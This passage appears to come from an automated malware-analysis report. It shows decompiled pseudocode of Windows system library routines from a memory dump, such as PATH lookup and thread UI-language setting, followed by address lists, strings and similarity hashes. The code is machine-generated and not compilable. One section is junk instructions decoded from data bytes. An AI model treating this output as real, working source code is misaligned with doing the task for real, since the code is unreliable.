				signed int _t233;
				signed int _t237;
				void* _t238;
				void* _t239;
				signed int _t243;
				signed int _t245;
				intOrPtr _t247;
				signed int _t250;
				signed int _t257;
				signed int _t260;
				signed int _t268;
				intOrPtr _t274;
				signed int _t276;
				signed int _t278;
				void* _t279;
				signed int _t280;
				unsigned int _t283;
				signed int _t287;
				intOrPtr* _t288;
				signed int _t289;
				signed int _t293;
				intOrPtr _t305;
				signed int _t314;
				signed int _t316;
				signed int _t317;
				signed int _t321;
				signed int _t322;
				void* _t324;
				signed int _t325;
				signed int _t327;
				signed int _t330;
				void* _t331;
				void* _t333;

				_t327 = _t330;
				_t331 = _t330 - 0x4c;
				_v8 =  *0x10dd360 ^ _t327;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t321 = 0x10db2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t283 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t333 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t274 = 0x48;
				_t303 = 0 | _t333 == 0x00000000;
				_t314 = 0;
				_v37 = _t333 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t274 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t322 = 0xc0000106;
						goto L32;
					} else {
						_t321 = L01004620(_t283,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t274);
						_v52 = _t321;
						__eflags = _t321;
						if(_t321 == 0) {
							_t322 = 0xc0000017;
							goto L32;
						} else {
							 *(_t321 + 0x44) =  *(_t321 + 0x44) & 0x00000000;
							_t50 = _t321 + 0x48; // 0x48
							_t316 = _t50;
							_t303 = _v32;
							 *((intOrPtr*)(_t321 + 0x3c)) = _t274;
							_t276 = 0;
							 *((short*)(_t321 + 0x30)) = _v48;
							__eflags = _t303;
							if(_t303 != 0) {
								 *(_t321 + 0x18) = _t316;
								__eflags = _t303 - 0x10d8478;
								 *_t321 = ((0 | _t303 == 0x010d8478) - 0x00000001 & 0xfffffffb) + 7;
								E0102F3E0(_t316,  *((intOrPtr*)(_t303 + 4)),  *_t303 & 0x0000ffff);
								_t303 = _v32;
								_t331 = _t331 + 0xc;
								_t276 = 1;
								__eflags = _a8;
								_t316 = _t316 + (( *_t303 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t268 = E010739F2(_t316);
									_t303 = _v32;
									_t316 = _t268;
								}
							}
							_t287 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t322 = _v68;
								__eflags = 0;
								 *((short*)(_t316 - 2)) = 0;
								goto L32;
							} else {
								_t278 = _t321 + _t276 * 4;
								_v56 = _t278;
								do {
									__eflags = _t303;
									if(_t303 != 0) {
										_t233 =  *(_v60 + _t287 * 4);
										__eflags = _t233;
										if(_t233 == 0) {
											goto L30;
										} else {
											__eflags = _t233 == 5;
											if(_t233 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t278 =  *(_v60 + _t287 * 4);
										 *(_t278 + 0x18) = _t316;
										_t237 =  *(_v60 + _t287 * 4);
										__eflags = _t237 - 8;
										if(_t237 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t237 * 4 +  &M01012959))) {
												case 0:
													__ax =  *0x10d8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0102F3E0(__edi,  *0x10d848c, __ax & 0x0000ffff);
														__eax =  *0x10d8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0102F3E0(_t316, _v80, _v64);
													_t263 = _v64;
													goto L26;
												case 2:
													 *0x10d8480 & 0x0000ffff = E0102F3E0(__edi,  *0x10d8484,  *0x10d8480 & 0x0000ffff);
													__eax =  *0x10d8480 & 0x0000ffff;
													__eax = ( *0x10d8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0102F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0102F3E0(_t316, _v76, _v36);
														_t263 = _v36;
													}
													L26:
													_t331 = _t331 + 0xc;
													_t316 = _t316 + (_t263 >> 1) * 2 + 2;
													__eflags = _t316;
													L27:
													_push(0x3b);
													_pop(_t265);
													 *((short*)(_t316 - 2)) = _t265;
													goto L28;
												case 6:
													__ebx =  *0x10d575c;
													__eflags = __ebx - 0x10d575c;
													if(__ebx != 0x10d575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0102F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x10d575c;
														} while (__ebx != 0x10d575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x10d8478 & 0x0000ffff = E0102F3E0(__edi,  *0x10d847c,  *0x10d8478 & 0x0000ffff);
													__eax =  *0x10d8478 & 0x0000ffff;
													__eax = ( *0x10d8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E010739F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x10d6e58 & 0x0000ffff = E0102F3E0(__edi,  *0x10d6e5c,  *0x10d6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x10d6e58 & 0x0000ffff;
													__eax = ( *0x10d6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t287 = _v16;
													_t303 = _v32;
													L29:
													_t278 = _t278 + 4;
													__eflags = _t278;
													_v56 = _t278;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t287 = _t287 + 1;
									_v16 = _t287;
									__eflags = _t287 - _v48;
								} while (_t287 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t237 =  *(_v60 + _t314 * 4);
						if(_t237 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t237 * 4 +  &M01012935))) {
							case 0:
								__ax =  *0x10d8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t303 =  &_v64;
								_v80 = E01012E3E(0,  &_v64);
								_t274 = _t274 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x10d8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x10d8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E00FFEEF0(0x10d79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E00FFEB70(__ecx, 0x10d79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t211 = _v72;
											__eflags = _t211;
											if(_t211 != 0) {
												L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t211);
											}
											_t212 = _v52;
											__eflags = _t212;
											if(_t212 != 0) {
												__eflags = _t322;
												if(_t322 < 0) {
													L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t212);
													_t212 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t283 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x10d7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L01004620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E00FFEB70(__ecx, 0x10d79a0);
										__eax = _v52;
										L36:
										_pop(_t315);
										_pop(_t323);
										__eflags = _v8 ^ _t327;
										_pop(_t275);
										return E0102B640(_t212, _t275, _v8 ^ _t327, _t303, _t315, _t323);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t270 = _v56;
								if(_v56 != 0) {
									_t303 =  &_v36;
									_t272 = E01012E3E(_t270,  &_v36);
									_t283 = _v36;
									_v76 = _t272;
								}
								if(_t283 == 0) {
									goto L44;
								} else {
									_t274 = _t274 + 2 + _t283;
								}
								goto L14;
							case 6:
								__eax =  *0x10d5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x10d8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x10d8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x10d6e58 & 0x0000ffff;
								__eax = ( *0x10d6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t314 = _t314 + 1;
								if(_t314 >= _v48) {
									goto L16;
								} else {
									_t303 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t288 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					 *_t288 =  *_t288 + _t237;
					asm("o16 sub [ecx], al");
					_t238 = _t237 + _t331;
					asm("daa");
					 *_t288 =  *_t288 + _t238;
					 *[es:ecx] =  *[es:ecx] + _t238;
					_t324 = _t321 + 1;
					 *_t288 =  *_t288 - _t238;
					 *0x1f010126 =  *0x1f010126 + _t238;
					_pop(_t279);
					_t239 = _t238 + 0x1289401;
					 *0x201055b =  *0x201055b + _t324;
					 *_t288 =  *_t288 - _t239;
					 *((intOrPtr*)(_t239 - 0x9fefed8)) =  *((intOrPtr*)(_t239 - 0x9fefed8)) + _t239;
					asm("daa");
					 *_t288 =  *_t288 + _t239;
					_push(ds);
					 *_t288 =  *_t288 - _t239;
					 *((intOrPtr*)(_t324 + 0x28)) =  *((intOrPtr*)(_t324 + 0x28)) + _t288;
					 *_t288 =  *_t288 + _t239;
					asm("daa");
					 *_t288 =  *_t288 + _t239;
					asm("fcomp dword [ebx+0x5]");
					 *((intOrPtr*)(_t239 +  &_a1546911997)) =  *((intOrPtr*)(_t239 +  &_a1546911997)) + _t324;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x10bff00);
					E0103D08C(_t279, _t316, _t324);
					_v44 =  *[fs:0x18];
					_t317 = 0;
					 *_a24 = 0;
					_t280 = _a12;
					__eflags = _t280;
					if(_t280 == 0) {
						_t243 = 0xc0000100;
					} else {
						_v8 = 0;
						_t325 = 0xc0000100;
						_v52 = 0xc0000100;
						_t245 = 4;
						while(1) {
							_v40 = _t245;
							__eflags = _t245;
							if(_t245 == 0) {
								break;
							}
							_t293 = _t245 * 0xc;
							_v48 = _t293;
							__eflags = _t280 -  *((intOrPtr*)(_t293 + 0xfc1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t260 = E0102E5C0(_a8,  *((intOrPtr*)(_t293 + 0xfc1668)), _t280);
									_t331 = _t331 + 0xc;
									__eflags = _t260;
									if(__eflags == 0) {
										_t325 = E010651BE(_t280,  *((intOrPtr*)(_v48 + 0xfc166c)), _a16, _t317, _t325, __eflags, _a20, _a24);
										_v52 = _t325;
										break;
									} else {
										_t245 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t245 = _t245 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t325;
						__eflags = _t325;
						if(_t325 < 0) {
							__eflags = _t325 - 0xc0000100;
							if(_t325 == 0xc0000100) {
								_t289 = _a4;
								__eflags = _t289;
								if(_t289 != 0) {
									_v36 = _t289;
									__eflags =  *_t289 - _t317;
									if( *_t289 == _t317) {
										_t325 = 0xc0000100;
										goto L76;
									} else {
										_t305 =  *((intOrPtr*)(_v44 + 0x30));
										_t247 =  *((intOrPtr*)(_t305 + 0x10));
										__eflags =  *((intOrPtr*)(_t247 + 0x48)) - _t289;
										if( *((intOrPtr*)(_t247 + 0x48)) == _t289) {
											__eflags =  *(_t305 + 0x1c);
											if( *(_t305 + 0x1c) == 0) {
												L106:
												_t325 = E01012AE4( &_v36, _a8, _t280, _a16, _a20, _a24);
												_v32 = _t325;
												__eflags = _t325 - 0xc0000100;
												if(_t325 != 0xc0000100) {
													goto L69;
												} else {
													_t317 = 1;
													_t289 = _v36;
													goto L75;
												}
											} else {
												_t250 = E00FF6600( *(_t305 + 0x1c));
												__eflags = _t250;
												if(_t250 != 0) {
													goto L106;
												} else {
													_t289 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t325 = E01012C50(_t289, _a8, _t280, _a16, _a20, _a24, _t317);
											L76:
											_v32 = _t325;
											goto L69;
										}
									}
									goto L108;
								} else {
									E00FFEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t325 = _a24;
									_t257 = E01012AE4( &_v36, _a8, _t280, _a16, _a20, _t325);
									_v32 = _t257;
									__eflags = _t257 - 0xc0000100;
									if(_t257 == 0xc0000100) {
										_v32 = E01012C50(_v36, _a8, _t280, _a16, _a20, _t325, 1);
									}
									_v8 = _t317;
									E01012ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t243 = _t325;
					}
					L70:
					return E0103D0D1(_t243);
				}
				L108:
			}

0x01012584
0x01012586
0x01012590
0x01012596
0x01012597
0x01012598
0x01012599
0x0101259e
0x010125a4
0x010125a9
0x010125ac
0x010125ae
0x010125b1
0x010125b2
0x010125b5
0x010125b8
0x010125bb
0x010125bc
0x010125bf
0x010125c2
0x010125c5
0x010125c6
0x010125cb
0x010125ce
0x010125d8
0x010125db
0x010125dd
0x010125de
0x010125e1
0x010125e3
0x010125e9
0x010126da
0x010126da
0x010126dd
0x010126e2
0x01055b56
0x00000000
0x010126e8
0x010126f9
0x010126fb
0x010126fe
0x01012700
0x01055b60
0x00000000
0x01012706
0x01012706
0x0101270a
0x0101270a
0x0101270d
0x01012713
0x01012716
0x01012718
0x0101271c
0x0101271e
0x01055b6c
0x01055b6f
0x01055b7f
0x01055b89
0x01055b8e
0x01055b93
0x01055b96
0x01055b9c
0x01055ba0
0x01055ba3
0x01055bab
0x01055bb0
0x01055bb3
0x01055bb3
0x01055ba3
0x01012724
0x01012726
0x01012729
0x0101272c
0x0101279d
0x0101279d
0x010127a0
0x010127a2
0x00000000
0x0101272e
0x0101272e
0x01012731
0x01012734
0x01012734
0x01012736
0x01055bc1
0x01055bc1
0x01055bc4
0x00000000
0x01055bca
0x01055bca
0x01055bcd
0x00000000
0x01055bd3
0x00000000
0x01055bd3
0x01055bcd
0x0101273c
0x0101273c
0x01012742
0x01012747
0x0101274a
0x0101274d
0x01012750
0x00000000
0x01012756
0x01012756
0x00000000
0x01012902
0x01012908
0x0101290b
0x00000000
0x01012911
0x0101291c
0x01012921
0x00000000
0x01012921
0x00000000
0x00000000
0x01012880
0x01012887
0x0101288c
0x00000000
0x00000000
0x01012805
0x0101280a
0x01012814
0x01012816
0x00000000
0x00000000
0x0101281e
0x01012821
0x01012823
0x00000000
0x01012829
0x01012829
0x01012831
0x0101283c
0x0101283e
0x00000000
0x0101283e
0x00000000
0x00000000
0x0101284e
0x01012850
0x01012851
0x01012854
0x01012857
0x0101285a
0x0101285c
0x0101285d
0x00000000
0x00000000
0x0101275d
0x01012761
0x00000000
0x01012767
0x0101276e
0x01012773
0x01012773
0x01012776
0x01012778
0x0101277e
0x0101277e
0x01012781
0x01012781
0x01012783
0x01012784
0x00000000
0x00000000
0x01055bd8
0x01055bde
0x01055be4
0x01055be6
0x01055be8
0x01055be9
0x01055bee
0x01055bf8
0x01055bff
0x01055c01
0x01055c04
0x01055c07
0x01055c0b
0x01055c0d
0x01055c0d
0x01055c15
0x01055c18
0x01055c1b
0x01055c1b
0x01055c1e
0x00000000
0x00000000
0x010128c3
0x010128c8
0x010128d2
0x010128d4
0x010128d8
0x010128db
0x01055c26
0x01055c28
0x01055c2d
0x01055c2d
0x00000000
0x00000000
0x01055c34
0x01055c36
0x01055c49
0x01055c4e
0x01055c54
0x01055c5b
0x01055c5d
0x01055c60
0x01012788
0x01012788
0x0101278b
0x0101278e
0x0101278e
0x0101278e
0x01012791
0x00000000
0x00000000
0x01012756
0x01012750
0x00000000
0x01012794
0x01012794
0x01012795
0x01012798
0x01012798
0x00000000
0x01012734
0x0101272c
0x01012700
0x010125ef
0x010125ef
0x010125ef
0x010125f2
0x010125f8
0x00000000
0x00000000
0x010125fe
0x00000000
0x010128e6
0x010128ec
0x010128ef
0x010128f5
0x010128f8
0x010128f8
0x00000000
0x010128f8
0x00000000
0x00000000
0x01012866
0x01012866
0x01012876
0x01012879
0x00000000
0x00000000
0x010127e0
0x010127e7
0x010127e9
0x010127eb
0x01055afd
0x00000000
0x01055afd
0x00000000
0x00000000
0x01012633
0x01012638
0x0101263b
0x0101263c
0x0101263e
0x01012640
0x01012642
0x01012647
0x01012649
0x0101264e
0x01012650
0x01012653
0x01012659
0x010126a2
0x010126a7
0x010126ac
0x010126b2
0x01055b11
0x01055b15
0x01055b17
0x00000000
0x010126b8
0x010126b8
0x010126ba
0x010127a6
0x010127a6
0x010127a9
0x010127ab
0x010127b9
0x010127b9
0x010127be
0x010127c1
0x010127c3
0x010127c5
0x010127c7
0x01055c74
0x01055c79
0x01055c79
0x010127c7
0x00000000
0x010126c0
0x010126c0
0x010126c3
0x010126c6
0x010126c6
0x010126c9
0x010126c9
0x00000000
0x010126c9
0x010126ba
0x0101265b
0x0101265b
0x0101265e
0x01012667
0x0101266d
0x01012677
0x0101267c
0x0101267f
0x01012681
0x01055b49
0x01055b4e
0x010127cd
0x010127d0
0x010127d1
0x010127d2
0x010127d4
0x010127dd
0x01012687
0x01012687
0x0101268a
0x0101268b
0x0101268e
0x0101268f
0x01012691
0x01012696
0x01012698
0x0101269d
0x0101269f
0x00000000
0x0101269f
0x01012681
0x00000000
0x00000000
0x01012846
0x00000000
0x00000000
0x01012605
0x0101260a
0x0101260c
0x01012611
0x01012616
0x01012619
0x01012619
0x0101261e
0x00000000
0x01012624
0x01012627
0x01012627
0x00000000
0x00000000
0x01055b1f
0x00000000
0x00000000
0x01012894
0x0101289b
0x0101289d
0x010128a1
0x01055b2b
0x01055b2e
0x01055b2e
0x010128a7
0x010128a9
0x01055b04
0x01055b09
0x01055b09
0x01055b09
0x00000000
0x00000000
0x01055b35
0x01055b3c
0x010128fb
0x010128fb
0x010126cc
0x010126cc
0x010126d0
0x00000000
0x010126d2
0x010126d2
0x00000000
0x010126d2
0x00000000
0x00000000
0x010125fe
0x0101292d
0x0101292f
0x01012930
0x01012935
0x01012937
0x01012939
0x0101293c
0x0101293e
0x0101293f
0x01012941
0x01012945
0x01012946
0x01012948
0x0101294e
0x0101294f
0x01012954
0x0101295a
0x0101295c
0x01012962
0x01012963
0x01012965
0x01012966
0x01012968
0x0101296b
0x0101296e
0x0101296f
0x01012971
0x01012974
0x01012980
0x01012981
0x01012982
0x01012983
0x01012984
0x01012985
0x01012986
0x01012987
0x01012988
0x01012989
0x0101298a
0x0101298b
0x0101298c
0x0101298d
0x0101298e
0x0101298f
0x01012990
0x01012992
0x01012997
0x010129a3
0x010129a6
0x010129ab
0x010129ad
0x010129b0
0x010129b2
0x01055c80
0x010129b8
0x010129b8
0x010129bb
0x010129c0
0x010129c5
0x010129c6
0x010129c6
0x010129c9
0x010129cb
0x00000000
0x00000000
0x010129cd
0x010129d0
0x010129d9
0x010129db
0x010129dd
0x01012a7f
0x01012a84
0x01012a87
0x01012a89
0x01055ca1
0x01055ca3
0x00000000
0x01012a8f
0x01012a8f
0x00000000
0x01012a8f
0x00000000
0x010129e3
0x010129e3
0x010129e3
0x00000000
0x010129e3
0x010129dd
0x00000000
0x010129db
0x010129e6
0x010129e9
0x010129eb
0x010129ed
0x010129f3
0x010129f5
0x010129f8
0x010129fa
0x01012a97
0x01012a9a
0x01012a9d
0x01012add
0x00000000
0x01012a9f
0x01012aa2
0x01012aa5
0x01012aa8
0x01012aab
0x01055cab
0x01055caf
0x01055cc5
0x01055cda
0x01055cdc
0x01055cdf
0x01055ce5
0x00000000
0x01055ceb
0x01055ced
0x01055cee
0x00000000
0x01055cee
0x01055cb1
0x01055cb4
0x01055cb9
0x01055cbb
0x00000000
0x01055cbd
0x01055cbd
0x00000000
0x01055cbd
0x01055cbb
0x01012ab1
0x01012ab1
0x01012ac4
0x01012ac6
0x01012ac6
0x00000000
0x01012ac6
0x01012aab
0x00000000
0x01012a00
0x01012a09
0x01012a0e
0x01012a21
0x01012a24
0x01012a35
0x01012a3a
0x01012a3d
0x01012a42
0x01012a59
0x01012a59
0x01012a5c
0x01012a5f
0x01012a5f
0x010129fa
0x010129f3
0x01012a64
0x01012a64
0x01012a6b
0x01012a6b
0x01012a6d
0x01012a72
0x01012a72
0x00000000

Strings

PATH, xrefs: 01012642, 01012691

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: f638929315d0ee638b1fd067c2c0d9508b6e08bcd8109d215c3c2c30738a175c
Instruction ID: cca27a16bf92238830b7feba0443c06178e5c8320f1ecf613b25f0b1912722cc
Opcode Fuzzy Hash: f638929315d0ee638b1fd067c2c0d9508b6e08bcd8109d215c3c2c30738a175c
Instruction Fuzzy Hash: F6C18071D00219DFDB25DF99D881BEEBBF1FF48750F248069E981AB294D738A941CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0101FAB0, Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0101FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E00FFEEF0(0x10d7b60);
					_t134 =  *0x10d7b84; // 0x77ad7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x10d7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x10d7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E00FF6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E00FF76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01088938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E00FEB150();
													}
													_t116 = E01086D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E00FF75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x10d8638; // 0x0
																	_t122 = L00FF38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E00FF76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E00FF76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0101FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L00FF70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
